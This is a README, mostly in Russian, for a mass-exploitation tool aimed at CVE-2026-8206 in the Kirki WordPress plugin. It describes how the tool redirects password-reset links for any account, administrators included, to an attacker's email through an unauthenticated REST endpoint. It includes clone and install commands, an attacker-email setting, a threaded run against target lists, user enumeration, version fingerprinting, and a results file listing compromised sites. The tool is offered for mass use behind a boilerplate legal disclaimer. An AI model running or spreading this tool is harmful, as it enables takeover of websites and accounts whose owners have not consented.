
Mass exploitation tool for CVE-2026-8206 – Unauthenticated Privilege Escalation via 'handle_forgot_password' in Kirki WordPress plugin (≤6.0.6).
Инструмент массового эксплойта для CVE-2026-8206 – критической уязвимости в плагине Kirki для WordPress (версии ≤ 6.0.6), которая позволяет неавторизованным атакующим перехватывать ссылки сброса пароля и получать полный контроль над любой учётной записью, включая администраторов.
Плагин Kirki предоставляет неавторизованную REST-конечную точку (/wp-json/KirkiComponentLibrary/v1/kirki-forgot-password). Из-за отсутствия проверок прав доступа и некорректной проверки email атакующий может:
Затронутые версии: ≤ 6.0.6
Исправленная версия: 6.0.7
readme.txt и kirki.min.css (поддерживает папки kirki и kirki-test)/wp-json/wp/v2/users (в крайнем случае использует admin)requestsconcurrent.futures (бэкпорт, обычно уже установлен)Установка зависимостей:
pip install requests futures
git clone https://github.com/Jenderal92/CVE-2026-8206.git
cd CVE-2026-8206
Отредактируйте скрипт, указав свой email атакующего:
ATTACKER_EMAIL = "[email protected]" # строка ~15
python CVE-2026-8206.py <targets_file> [threads]
<targets_file> – текстовый файл с одним доменом на строку (с http:///https:// или без них)[threads] – необязательный параметр, количество одновременных потоков (по умолчанию: 15)python CVE-2026-8206.py targets.txt 20
targets.txt)example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
res.txt – содержит успешно эксплуатируемые цели в формате:
URL|username|attacker_email|reset_link_sent_to_attacker_email
Пример:
https://example.com|admin|[email protected]|reset_link_sent_to_attacker_email
Вывод в консоль показывает ход выполнения в реальном времени:
/wp-content/plugins/{kirki,kirki-test}/readme.txt (Stable tag) и /.../kirki.min.css (параметр ver). Если версия ≤ 6.0.6, продолжение./wp-json/wp/v2/users; если результат пуст, используется admin.username = имя целевого пользователяemail = email атакующегоemailBody = JSON, содержащий чип reset_link200 и сообщением "Email sent", цель записывается в res.txt.Данное программное обеспечение предоставляется только для образовательных целей и санкционированного тестирования безопасности. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения, является незаконным. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.
Более подробный отказ от ответственности можно найти на обложке Jenderal92. Вы можете ознакомиться с ним ЗДЕСЬ !!!